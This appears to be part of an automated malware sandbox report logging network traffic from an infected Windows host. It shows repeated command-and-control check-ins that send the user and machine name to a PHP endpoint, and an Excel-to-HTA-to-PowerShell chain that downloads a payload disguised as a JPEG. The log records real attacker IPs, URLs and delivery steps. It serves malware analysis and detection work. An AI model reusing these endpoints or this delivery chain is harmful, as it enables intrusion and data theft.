Oct 24, 2024 21:23:59.275065899 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:00.322951078 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49194	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:00.657490969 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:00.662976027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:01.787553072 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49195	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:01.921905041 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:01.927480936 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:03.086314917 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49196	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:03.255458117 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:03.260935068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:04.455794096 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49197	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:04.909286976 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:04.916021109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:07.129631042 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49198	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:07.352407932 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:07.357975006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:08.466027021 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49199	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:08.605921030 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:08.611452103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:09.780390024 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49200	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:10.050141096 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:10.055685043 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:14.272247076 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49201	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:14.421621084 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:14.427514076 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:15.557713032 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49202	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:15.726511002 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:15.731889009 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:16.929487944 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49203	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:17.094152927 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:17.099666119 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:18.131926060 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49204	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:18.283521891 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:18.288921118 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:19.432138920 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49205	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:24:19.579586983 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:24:19.585022926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:24:20.593719959 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:24:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	5.159.62.244	443	3596	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:22:36 UTC	319	OUT	GET /ZDFWtO HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: mpa.li Connection: Keep-Alive
2024-10-24 19:22:36 UTC	468	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 24 Oct 2024 19:22:36 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 105 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta Vary: Accept
2024-10-24 19:22:36 UTC	105	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 35 2f 6f 75 2f 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 68 69 63 68 65 76 65 6e 6e 6f 62 6f 64 6b 6e 6f 77 74 68 61 74 6b 69 73 73 69 6e 67 6d 65 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	5.159.62.243	443	3868	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:22:42 UTC	343	OUT	GET /ZDFWtO HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: mpa.li Connection: Keep-Alive
2024-10-24 19:22:42 UTC	468	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 24 Oct 2024 19:22:42 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 105 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta Vary: Accept
2024-10-24 19:22:42 UTC	105	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 33 35 2f 6f 75 2f 6e 69 63 65 67 69 72 6c 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 68 69 63 68 65 76 65 6e 6e 6f 62 6f 64 6b 6e 6f 77 74 68 61 74 6b 69 73 73 69 6e 67 6d 65 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49168	142.250.186.46	443	1224	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:23:01 UTC	121	OUT	GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
2024-10-24 19:23:01 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 24 Oct 2024 19:23:01 GMT Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-jrETwbn4hplHXA4sSdArnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49169	172.217.16.193	443	1224	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:23:03 UTC	139	OUT	GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-24 19:23:06 UTC	4906	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="new_image-new.jpg" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 2239109 Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT X-GUploader-UploadID: AHmUCY0yXYId2Hb7TE9gYWlrdarS6jbYxdkHa0MTlUmajWf0UXZc_zLBY5Z2Nx1dF-q0HN5YT61Z2FIz-w Date: Thu, 24 Oct 2024 19:23:05 GMT Expires: Thu, 24 Oct 2024 19:23:05 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=WqxmdA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-24 19:23:06 UTC	4906	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-10-24 19:23:06 UTC	4886	IN	Data Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo\|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
